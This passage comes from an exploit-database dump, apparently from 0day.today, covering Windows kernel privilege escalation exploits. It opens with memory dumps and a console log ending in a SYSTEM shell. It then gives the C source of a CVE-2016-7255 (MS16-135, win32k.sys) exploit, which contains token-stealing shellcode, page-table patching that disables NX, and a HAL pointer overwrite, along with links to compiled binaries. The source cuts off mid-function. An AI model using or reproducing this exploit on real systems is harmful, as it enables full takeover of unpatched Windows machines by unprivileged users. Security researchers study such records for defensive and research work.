................\r\n000000003D9ECB10 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECB20 | 00 00 00 00 00 00 00 00 63 18 8b 00 00 00 00 00 | ........c.......\r\n000000003D9ECB30 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECB40 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECB50 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECB60 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECB70 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECB80 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECB90 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECBA0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECBB0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECBC0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECBD0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECBE0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECBF0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECC00 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECC10 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECC20 | 63 78 82 00 00 00 00 00 00 00 00 00 00 00 00 00 | cx..............\r\n000000003D9ECC30 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECC40 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECC50 | 63 b8 57 00 00 00 00 00 00 00 00 00 00 00 00 00 | c.W.............\r\n000000003D9ECC60 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECC70 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECC80 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECC90 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECCA0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECCB0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECCC0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECCD0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECCE0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECCF0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECD00 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECD10 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECD20 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECD30 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECD40 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECD50 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECD60 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECD70 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECD80 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECD90 | 63 08 a9 30 01 00 00 00 63 68 c2 2a 00 00 00 00 | c..0....ch.*....\r\n000000003D9ECDA0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECDB0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECDC0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECDD0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECDE0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECDF0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECE00 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECE10 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECE20 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECE30 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECE40 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECE50 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECE60 | 63 78 8b 00 00 00 00 00 00 00 00 00 00 00 00 00 | cx..............\r\n000000003D9ECE70 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECE80 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECE90 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECEA0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECEB0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECEC0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECED0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECEE0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECEF0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECF00 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECF10 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECF20 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECF30 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECF40 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECF50 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECF60 | 67 18 21 00 01 00 00 80 00 00 00 00 00 00 00 00 | g.!.............\r\n000000003D9ECF70 | 00 00 00 00 00 00 00 00 63 10 98 00 00 00 00 00 | ........c.......\r\n000000003D9ECF80 | 63 40 98 00 00 00 00 00 00 00 00 00 00 00 00 00 | [email\u00a0protected]\r\n000000003D9ECF90 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECFA0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECFB0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECFC0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECFD0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECFE0 | 63 d8 34 02 00 00 00 00 63 38 8c 00 00 00 00 00 | c.4.....c8......\r\n000000003D9ECFF0 | 00 00 00 00 00 00 00 00 63 f0 99 00 00 00 00 00 | ........c.......\r\n \r\n+] Selected spurious PML4E: fffff67b3d9ecf00\r\n+] Spurious PT: fffff67b3d9e0000\r\n+] Content pml4e fffff67b3d9ecff8: 99f063\r\n+] Patching the Spurious Offset with 99f067\r\n+] Content pdpte fffff67b3d9ffff8: 9a0063\r\n+] Patching the Spurious Offset with 9a0067\r\n+] Content pdpte fffff67b3ffffff0: 821063\r\n+] Patching the Spurious Offset with 821067\r\n+] Content pte fffff67fffffe800: 1967\r\n+] Patching the Spurious Offset with 1967\r\nOriginal HalpIntteruptRequest pointer: fffff80150e1fc40\r\n+] Selected spurious PML4E: fffff67b3d9ecf08\r\n+] Spurious PT: fffff67b3d9e1000\r\n+] Content pml4e fffff67b3d9ecff8: 99f063\r\n+] Patching the Spurious Offset with 99f067\r\n+] Content pdpte fffff67b3d9ffff8: 9a0063\r\n+] Patching the Spurious Offset with 9a0067\r\n+] Content pdpte fffff67b3ffffff0: 821063\r\n+] Patching the Spurious Offset with 821067\r\n+] Content pte fffff67fffffe800: 1967\r\n*** Patching the original location to enable NX...\r\n+] Patching the Spurious Offset with 1967\r\nHAL address: fffff67b3d9e1000\r\n+] w00t: Shellcode stored at: ffffffffffd00d50\r\n+] Selected spurious PML4E: fffff67b3d9ecf10\r\n+] Spurious PT: fffff67b3d9e2000\r\n+] Content pml4e fffff67b3d9ecff8: 99f063\r\n+] Patching the Spurious Offset with 99f067\r\n+] Content pdpte fffff67b3d9ffff8: 9a0063\r\n+] Patching the Spurious Offset with 9a0067\r\n+] Content pdpte fffff67b3ffffff0: 821063\r\n+] Patching the Spurious Offset with 821067\r\n+] Content pte fffff67fffffe800: 1967\r\n+] Patching the Spurious Offset with 1967\r\nPatch HalpInterruptController->HalpApicRequestInterrupt: fffff67b3d9e26e8 with ffffffffffd00d50\r\nMicrosoft Windows [Version 10.0.14393]\r\n(c) 2016 Microsoft Corporation. All rights reserved.\r\n \r\nC:\\Users\\qa\\Desktop>\r\nC:\\Users\\qa\\Desktop>whoami\r\nnt authority\\system\r\n \r\nC:\\Users\\qa\\Desktop>\n\n# 0day.today [2018-02-18] #", "sourceHref": "https://0day.today/exploit/26414", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-04T07:12:42", "description": "Exploit for windows platform in category local exploits", "edition": 1, "published": "2017-01-11T00:00:00", "title": "Microsoft Windows Kernel - win32k.sys NtSetWindowLongPtr Privilege Escalation (MS16-135) (2)", "type": "zdt", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-7255"], "modified": "2017-01-11T00:00:00", "href": "https://0day.today/exploit/description/26645", "id": "1337DAY-ID-26645", "sourceData": "/*\r\nSource: https://ricklarabee.blogspot.com/2017/01/virtual-memory-page-tables-and-one-bit.html\r\n \r\nBinary: https://github.com/rlarabee/exploits/raw/8b9eb646516d7f022a010f28018209f331c28975/cve-2016-7255/compiled/cve-2016-7255.exe\r\nMirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/41015.exe\r\n*/\r\n \r\n// ricklarabee.blogspot.com\r\n \r\n//This program is free software; you can redistribute it and/or\r\n//modify it under the terms of the GNU General Public License\r\n//as published by the Free Software Foundation.\r\n \r\n//This program is distributed in the hope that it will be useful,\r\n//but WITHOUT ANY WARRANTY; without even the implied warranty of\r\n//MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.See the\r\n//GNU General Public License for more details.\r\n \r\n//You should have received a copy of the GNU General Public License\r\n//along with this program; if not, write to the Free Software\r\n//Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.\r\n \r\n// Credits: [email\u00a0protected]: https://github.com/IOActive/I-know-where-your-page-lives/tree/master/code/CVE-2016-7255\r\n// PoC from https://github.com/tinysec/public/tree/master/CVE-2016-7255\r\n \r\n#include <windows.h>\r\n#include <wchar.h>\r\n#include <stdlib.h>\r\n#include <stdio.h>\r\n \r\n#pragma comment(lib,\"ntdll.lib\")\r\n#pragma comment(lib,\"user32.lib\")\r\n#pragma comment(lib, \"advapi32\")\r\n \r\nUINT64 PML4_BASE;\r\nUINT PML4_SELF_REF_INDEX;\r\nUINT64 PML4_SELF_REF = 0xFFFFF6FB7DBEDF68;\r\n \r\n#define STATUS_SUCCESS ((NTSTATUS)0x00000000L)\r\n#define STATUS_UNSUCCESSFUL ((NTSTATUS)0xC0000001L)\r\n#define GET_INDEX(va) ( ((va >> 39) & 0x1ff )) \r\n \r\n////////////////////////////////////////////////////////\r\n// Define Data Types\r\n////////////////////////////////////////////////////////\r\ntypedef struct _SYSTEM_MODULE_INFORMATION_ENTRY {\r\n PVOID Unknown1;\r\n PVOID Unknown2;\r\n PVOID Base;\r\n ULONG Size;\r\n ULONG Flags;\r\n USHORT Index;\r\n USHORT NameLength;\r\n USHORT LoadCount;\r\n USHORT PathLength;\r\n CHAR ImageName[256];\r\n} SYSTEM_MODULE_INFORMATION_ENTRY, *PSYSTEM_MODULE_INFORMATION_ENTRY;\r\n \r\ntypedef struct _SYSTEM_MODULE_INFORMATION {\r\n ULONG Count;\r\n SYSTEM_MODULE_INFORMATION_ENTRY Module[1];\r\n} SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION;\r\n \r\ntypedef enum _SYSTEM_INFORMATION_CLASS { \r\n SystemModuleInformation = 11,\r\n SystemHandleInformation = 16\r\n} SYSTEM_INFORMATION_CLASS;\r\n \r\ntypedef NTSTATUS (WINAPI *NtQuerySystemInformation_t)(IN SYSTEM_INFORMATION_CLASS SystemInformationClass,\r\n OUT PVOID SystemInformation,\r\n IN ULONG SystemInformationLength,\r\n OUT PULONG ReturnLength);\r\n \r\ntypedef NTSTATUS (WINAPI *NtQueryIntervalProfile_t)(IN ULONG ProfileSource,\r\n OUT PULONG Interval);\r\n \r\nNtQuerySystemInformation_t NtQuerySystemInformation;\r\nNtQueryIntervalProfile_t NtQueryIntervalProfile;\r\n \r\nchar shellcode[] = {\r\n //0xcc,\r\n 0xfa, // CLI\r\n 0x9c, // PUSHFQ\r\n 0x48, 0xb8, 0x90, 0x90, 0x90 ,0x90 ,0x90, 0x90, 0x90, 0x90, // MOV RAX, Original Pointer\r\n 0x50, // PUSH RAX\r\n 0x51, // PUSH RCX\r\n 0x48, 0xb9, 0x90, 0x90, 0x90 ,0x90 ,0x90, 0x90, 0x90, 0x90, // MOV RCX, [OverwriteAddr+OverwriteOffset]\r\n 0x48, 0x89, 0x01, // MOV QWORD PTR [RCX], RAX\r\n 0xb9, 0x90, 0x90, 0x90, 0x90, // MOV ECX, PID\r\n 0x53, // PUSH RBX\r\n \r\n 0x65, 0x48, 0x8B, 0x04, 0x25, 0x88, 0x01, 0x00, 0x00, // MOV RAX,QWORD PTR gs:0x188\r\n 0x48, 0x8B, 0x80, 0xB8, 0x00, 0x00, 0x00, // MOV RAX,QWORD PTR [RAX+0xb8] EPROCESS\r\n 0x48, 0x8d, 0x80, 0x90, 0x90, 0x00, 0x00, // LEA RAX,[RAX+0xActiveProcessLinkOffset] \r\n //<tag>\r\n 0x48, 0x8b, 0x00, // MOV RAX,QWORD PTR [RAX]\r\n 0x48, 0x8b, 0x58, 0xf8, // MOV RBX,QWORD PTR [RAX-0x8] // UniqueProcessID\r\n 0x48, 0x83, 0xfb, 0x04, // CMP RBX,0x4\r\n 0x75, 0xf3, // JNE <tag>\r\n 0x48, 0x8b, 0x98, 0x90, 0x90, 0x90, 0x90, // MOV RBX, QWORD PTR [RAX+0x60] // GET TOKEN of SYSTEM\r\n \r\n 0x53, // PUSH RBX\r\n //<tag2>\r\n 0x48, 0x8b, 0x00, // MOV RAX,QWORD PTR [RAX]\r\n 0x48, 0x8b, 0x58, 0xf8, // MOV RBX,QWORD PTR [RAX-0x8] // UniqueProcessID\r\n 0x39, 0xcb, // CMP EBX, ECX // our PID\r\n 0x75, 0xf5, // JNE <tag2>\r\n 0x5b, // POP RBX\r\n 0x48, 0x89, 0x98, 0x90, 0x90, 0x90, 0x90, // MOV QWORD PTR[RAX + 0x60], RBX\r\n \r\n 0x5b, // POP RBX\r\n 0x59, // POP RCX\r\n 0x58, // POP RAX\r\n 0x9d, // POPFQ\r\n \r\n 0xfb, // STI\r\n 0xff, 0xe0 // JMP RAX\r\n};\r\n \r\nULONG __cdecl DbgPrint(__in char* Format, ...)\r\n{\r\n CHAR* pszDbgBuff = NULL;\r\n va_list VaList = NULL;\r\n ULONG ulRet = 0;\r\n \r\n do\r\n {\r\n pszDbgBuff = (CHAR*)HeapAlloc(GetProcessHeap(), 0, 1024 * sizeof(CHAR));\r\n if (NULL == pszDbgBuff)\r\n {\r\n break;\r\n }\r\n RtlZeroMemory(pszDbgBuff, 1024 * sizeof(CHAR));\r\n \r\n va_start(VaList, Format);\r\n \r\n _vsnprintf((CHAR*)pszDbgBuff, 1024 - 1, Format, VaList);\r\n \r\n \r\n OutputDebugStringA(pszDbgBuff);\r\n \r\n va_end(VaList);\r\n \r\n } while (FALSE);\r\n \r\n if (NULL != pszDbgBuff)\r\n {\r\n HeapFree(GetProcessHeap(), 0, pszDbgBuff);\r\n pszDbgBuff = NULL;\r\n }\r\n \r\n return ulRet;\r\n}\r\n \r\n \r\nint _sim_key_down(WORD wKey)\r\n{\r\n INPUT stInput = { 0 };\r\n \r\n do\r\n {\r\n stInput.type = INPUT_KEYBOARD;\r\n stInput.ki.wVk = wKey;\r\n stInput.ki.dwFlags = 0;\r\n \r\n SendInput(1, &stInput, sizeof(stInput));\r\n \r\n } while (FALSE);\r\n \r\n return 0;\r\n}\r\n \r\nint _sim_key_up(WORD wKey)\r\n{\r\n INPUT stInput = { 0 };\r\n \r\n do\r\n {\r\n stInput.type = INPUT_KEYBOARD;\r\n stInput.ki.wVk = wKey;\r\n stInput.ki.dwFlags = KEYEVENTF_KEYUP;\r\n \r\n SendInput(1, &stInput, sizeof(stInput));\r\n \r\n } while (FALSE);\r\n \r\n return 0;\r\n}\r\n \r\nint _sim_alt_shift_esc()\r\n{\r\n int i = 0;\r\n \r\n do\r\n {\r\n _sim_key_down(VK_MENU);\r\n _sim_key_down(VK_SHIFT);\r\n \r\n \r\n _sim_key_down(VK_ESCAPE);\r\n _sim_key_up(VK_ESCAPE);\r\n \r\n _sim_key_down(VK_ESCAPE);\r\n _sim_key_up(VK_ESCAPE);\r\n \r\n _sim_key_up(VK_MENU);\r\n _sim_key_up(VK_SHIFT);\r\n \r\n \r\n } while (FALSE);\r\n \r\n return 0;\r\n}\r\n \r\n \r\n \r\nint _sim_alt_shift_tab(int nCount)\r\n{\r\n int i = 0;\r\n HWND hWnd = NULL;\r\n \r\n \r\n int nFinalRet = -1;\r\n \r\n do\r\n {\r\n _sim_key_down(VK_MENU);\r\n _sim_key_down(VK_SHIFT);\r\n \r\n \r\n for (i = 0; i < nCount; i++)\r\n {\r\n _sim_key_down(VK_TAB);\r\n _sim_key_up(VK_TAB);\r\n \r\n Sleep(1000);\r\n \r\n }\r\n \r\n \r\n _sim_key_up(VK_MENU);\r\n _sim_key_up(VK_SHIFT);\r\n } while (FALSE);\r\n \r\n return nFinalRet;\r\n}\r\n \r\nint _sim_alt_esc(int count)\r\n{\r\n int i = 0;\r\n \r\n for (i = 0; i<count; i++)\r\n {\r\n _sim_key_down(VK_MENU);\r\n //_sim_key_down(VK_SHIFT);\r\n \r\n \r\n _sim_key_down(VK_ESCAPE);\r\n _sim_key_up(VK_ESCAPE);\r\n \r\n _sim_key_down(VK_ESCAPE);\r\n _sim_key_up(VK_ESCAPE);\r\n \r\n _sim_key_up(VK_MENU);\r\n //_sim_key_up(VK_SHIFT);\r\n \r\n }\r\n \r\n return 0;\r\n}\r\n \r\n \r\nint or_address_value_4(__in void* pAddress)\r\n{\r\n WNDCLASSEXW stWC = { 0 };\r\n \r\n HWND hWndParent = NULL;\r\n HWND hWndChild = NULL;\r\n \r\n WCHAR* pszClassName = L\"cve-2016-7255\";\r\n WCHAR* pszTitleName = L\"cve-2016-7255\";\r\n \r\n void* pId = NULL;\r\n MSG stMsg = { 0 };\r\n \r\n UINT64 value = 0;\r\n \r\n do\r\n {\r\n \r\n stWC.cbSize = sizeof(stWC);\r\n stWC.lpfnWndProc = DefWindowProcW;\r\n stWC.lpszClassName = pszClassName;\r\n \r\n if (0 == RegisterClassExW(&stWC))\r\n {\r\n break;\r\n }\r\n \r\n hWndParent = CreateWindowExW(\r\n 0,\r\n pszClassName,\r\n NULL,\r\n WS_OVERLAPPEDWINDOW | WS_VISIBLE,\r\n 0,\r\n 0,\r\n 360,\r\n 360,\r\n NULL,\r\n NULL,\r\n GetModuleHandleW(NULL),\r\n NULL\r\n );\r\n \r\n if (NULL == hWndParent)\r\n {\r\n break;\r\n }\r\n \r\n hWndChild = CreateWindowExW(\r\n 0,\r\n pszClassName,\r\n pszTitleName,\r\n WS_OVERLAPPEDWINDOW | WS_VISIBLE | WS_CHILD,\r\n 0,\r\n 0,\r\n 160,\r\n 160,\r\n hWndParent,\r\n NULL,\r\n GetModuleHandleW(NULL),\r\n NULL\r\n );\r\n \r\n if (NULL == hWndChild)\r\n {\r\n break;\r\n }\r\n \r\n#ifdef _WIN64\r\n pId = ((UCHAR*)pAddress - 0x28);\r\n#else\r\n pId = ((UCHAR*)pAddress - 0x14);\r\n#endif // #ifdef _WIN64\r\n \r\n SetWindowLongPtr(hWndChild, GWLP_ID, (LONG_PTR)pId);\r\n \r\n DbgPrint(\"hWndChild = 0x%p\\n\", hWndChild);\r\n \r\n ShowWindow(hWndParent, SW_SHOWNORMAL);\r\n \r\n SetParent(hWndChild, GetDesktopWindow());\r\n \r\n SetForegroundWindow(hWndChild);\r\n \r\n _sim_alt_shift_tab(4);\r\n \r\n SwitchToThisWindow(hWndChild, TRUE);\r\n \r\n _sim_alt_shift_esc();\r\n \r\n while (GetMessage(&stMsg, NULL, 0, 0)) {\r\n \r\n SetFocus(hWndParent);\r\n _sim_alt_esc(20);\r\n SetFocus(hWndChild);\r\n _sim_alt_esc(20);\r\n \r\n TranslateMessage(&stMsg);\r\n DispatchMessage(&stMsg);\r\n \r\n if (value != 0) {\r\n break;\r\n }\r\n \r\n \r\n __try {\r\n value = *(UINT64 *)PML4_SELF_REF;\r\n if ((value & 0x67) == 0x67) {\r\n printf(\"Value Self Ref = %llx\\n\", value);\r\n break;\r\n }\r\n }\r\n __except (EXCEPTION_EXECUTE_HANDLER) {\r\n continue;\r\n }\r\n \r\n }\r\n \r\n \r\n } while (FALSE);\r\n \r\n if (NULL != hWndParent)\r\n {\r\n DestroyWindow(hWndParent);\r\n hWndParent = NULL;\r\n }\r\n \r\n if (NULL != hWndChild)\r\n {\r\n DestroyWindow(hWndChild);\r\n hWndChild = NULL;\r\n }\r\n \r\n UnregisterClassW(pszClassName, GetModuleHandleW(NULL));\r\n \r\n return 0;\r\n}\r\n \r\nUINT64 get_pxe_address(UINT64 address) {\r\n UINT entry = PML4_SELF_REF_INDEX;\r\n UINT64 result = address >> 9;\r\n UINT64 lower_boundary = ((UINT64)0xFFFF << 48) | ((UINT64)entry << 39);\r\n UINT64 upper_boundary = (((UINT64)0xFFFF << 48) | ((UINT64)entry << 39) + 0x8000000000 - 1) & 0xFFFFFFFFFFFFFFF8;\r\n result = result | lower_boundary;\r\n result = result & upper_boundary;\r\n return result;\r\n}\r\n \r\nUINT64 look_free_entry_pml4(void) {\r\n // Looks for a free pml4e in the last 0x100 bytes of the PML4\r\n int offset = 0xF00;\r\n UINT64 pml4_search = PML4_BASE + offset;\r\n while (offset < 0xFF8)\r\n {\r\n if ((*(PVOID *)pml4_search) == 0x0)\r\n {\r\n // This is a NULL (free) entry\r\n break;\r\n }\r\n offset += 8;\r\n pml4_search = PML4_BASE + offset;\r\n }\r\n return pml4_search;\r\n}\r\n \r\nUINT64 calculate_spurious_pt_address(UINT64 spurious_offset) {\r\n UINT64 index = (spurious_offset & 0xFFF) / 8;\r\n UINT64 result = (\r\n ((UINT64)0xFFFF << 48) |\r\n ((UINT64)PML4_SELF_REF_INDEX << 39) |\r\n ((UINT64)PML4_SELF_REF_INDEX << 30) |\r\n ((UINT64)PML4_SELF_REF_INDEX << 21) |\r\n (index << 12)\r\n );\r\n return result;\r\n}\r\n \r\n \r\n \r\nUINT64 create_spurious_pte_to_virtual_address(UINT64 virtual_address, BOOL patch_original) {\r\n \r\n /*\r\n 1: kd> !pte ffffffff`ffd00000\r\n VA ffffffffffd00000\r\n PXE at FFFFF6FB7DBEDFF8 PPE at FFFFF6FB7DBFFFF8 PDE at FFFFF6FB7FFFFFF0 PTE at FFFFF6FFFFFFE800\r\n contains 0000000000A1F063 contains 0000000000A20063 contains 0000000000A25063 contains 8000000000103963\r\n pfn a1f-- - DA--KWEV pfn a20-- - DA--KWEV pfn a25-- - DA--KWEV pfn 103 - G - DA--KW - V\r\n */ \r\n \r\n UINT64 pte = get_pxe_address(virtual_address);\r\n int pte_offset = pte & 0xFFF;\r\n //printf(\"PTE: %llx, %x\\n\", pte, pte_offset);\r\n \r\n UINT64 pde = get_pxe_address(pte);\r\n int pde_offset = pde & 0xFFF;\r\n //printf(\"PDE: %llx, %x\\n\", pde, pde_offset);\r\n \r\n UINT64 pdpte = get_pxe_address(pde);\r\n int pdpte_offset = pdpte & 0xFFF;\r\n //printf(\"PDPTE: %llx,%x\\n\", pdpte, pdpte_offset);\r\n \r\n UINT64 pml4e = get_pxe_address(pdpte);\r\n int pml4e_offset = pml4e & 0xFFF;\r\n //printf(\"PML4E: %llx\\n\", pml4e, pml4e_offset);\r\n \r\n UINT64 spurious_offset = look_free_entry_pml4();\r\n printf(\"[+] Selected spurious PML4E: %llx\\n\", spurious_offset);\r\n UINT64 f_e_pml4 = spurious_offset;\r\n UINT64 spurious_pt = calculate_spurious_pt_address(spurious_offset);\r\n printf(\"[+] Spurious PT: %llx\\n\", spurious_pt);\r\n printf(\"--------------------------------------------------\\n\\n\");\r\n \r\n \r\n //Read the physical address of pml4e \r\n UINT64 pml4e_pfn = (UINT64)(*(PVOID *)pml4e);\r\n printf(\"[+] Content pml4e %llx: %llx\\n\", pml4e, pml4e_pfn);\r\n // Change the PxE\r\n pml4e_pfn = pml4e_pfn | 0x67; // Set U/S\r\n \r\n printf(\"[+] Patching the Spurious Offset (PML4e) %llx: %llx\\n\",f_e_pml4, pml4e_pfn);\r\n *((PVOID *)spurious_offset) = (PVOID)pml4e_pfn;\r\n Sleep(0x1); // Sleep for TLB refresh;\r\n \r\n //Read the physical address of pdpte\r\n UINT64 pdpte_pfn = (UINT64) *(PVOID *)(spurious_pt + pdpte_offset);\r\n printf(\"[+] Content pdpte %llx: %llx\\n\", pdpte, pdpte_pfn);\r\n // Change the PxE\r\n pdpte_pfn = pdpte_pfn | 0x67; // Set U/S\r\n printf(\"[+] Patching the Spurious Offset (PDPTE) %llx: %llx\\n\", spurious_offset, pdpte_pfn);\r\n *((PVOID *)spurious_offset) = (PVOID)pdpte_pfn;\r\n Sleep(0x1); // Sleep for TLB refresh;\r\n \r\n //Read the physical address of pde\r\n UINT64 pde_addr = spurious_pt + pde_offset;\r\n UINT64 pde_pfn = (UINT64) *(PVOID *)(spurious_pt + pde_offset);\r\n printf(\"[+] Content pdpe %llx: %llx\\n\", pde, pde_pfn);\r\n // Change the PxE\r\n pde_pfn = pde_pfn | 0x67; // Set U/S\r\n printf(\"[+] Patching the Spurious Offset (PDE) %llx: %llx\\n\", spurious_offset, pde_pfn);\r\n *((PVOID *)spurious_offset) = (PVOID)pde_pfn;\r\n Sleep(0x1); // Sleep for TLB refresh;\r\n \r\n //Read the physical address of pte\r\n UINT64 pte_addr = spurious_pt + pte_offset;\r\n UINT64 pte_pfn = (UINT64) *(PVOID *)(spurious_pt + pte_offset);\r\n printf(\"[+] Content pte %llx: %llx\\n\", pte, pte_pfn);\r\n // Change the PxE\r\n pte_pfn = pte_pfn | 0x67; // Set U/S\r\n pte_pfn = pte_pfn & 0x7fffffffffffffff; // Turn off NX \r\n if (patch_original) {\r\n printf(\"*** Patching the original location to enable NX...\\n\");\r\n *(PVOID *)(spurious_pt + pte_offset) = (PVOID)pte_pfn;\r\n }\r\n \r\n printf(\"[+] Patching the Spurious Offset (PTE) %llx: %llx\\n\", spurious_offset, pte_pfn);\r\n *((PVOID *)spurious_offset) = (PVOID)pte_pfn;\r\n Sleep(0x1); // Sleep for TLB refresh;\r\n printf(\"\\n\\n\");\r\n return spurious_pt;\r\n}\r\n \r\nUINT64 get_OverwriteAddress_pointer(UINT64 target_address, int target_offset) {\r\n printf(\"[*] Getting Overwrite pointer: %llx\\n\", target_address);\r\n UINT64 OverwriteAddress = create_spurious_pte_to_virtual_address(target_address, FALSE);\r\n OverwriteAddress += (target_address & 0xFFF);\r\n printf(\"OverwriteAddress: %llx\\n\", OverwriteAddress);\r\n return (UINT64) *((PVOID *)(((char *)OverwriteAddress) + target_offset));\r\n}\r\n \r\nvoid overwrite_TargetAddress(UINT64 hook_address, UINT64 target_address, int target_offset) {\r\n UINT64 OverwriteTarget = create_spurious_pte_to_virtual_address(target_address, FALSE);\r\n OverwriteTarget += (target_address & 0xFFF);\r\n UINT64 target = (UINT64)((char *)OverwriteTarget) + target_offset;\r\n printf(\"Patch OverwriteTarget: %llx with %llx\\n\", target, hook_address);\r\n *(PVOID *)target = (PVOID)hook_address;\r\n}\r\n \r\n \r\nUINT64 store_shellcode_in_hal(void) {\r\n //// Finally store the shellcode on the HAL\r\n \r\n UINT64 hal_heap_addr = 0xFFFFFFFFFFD00000;\r\n UINT64 hal_heap 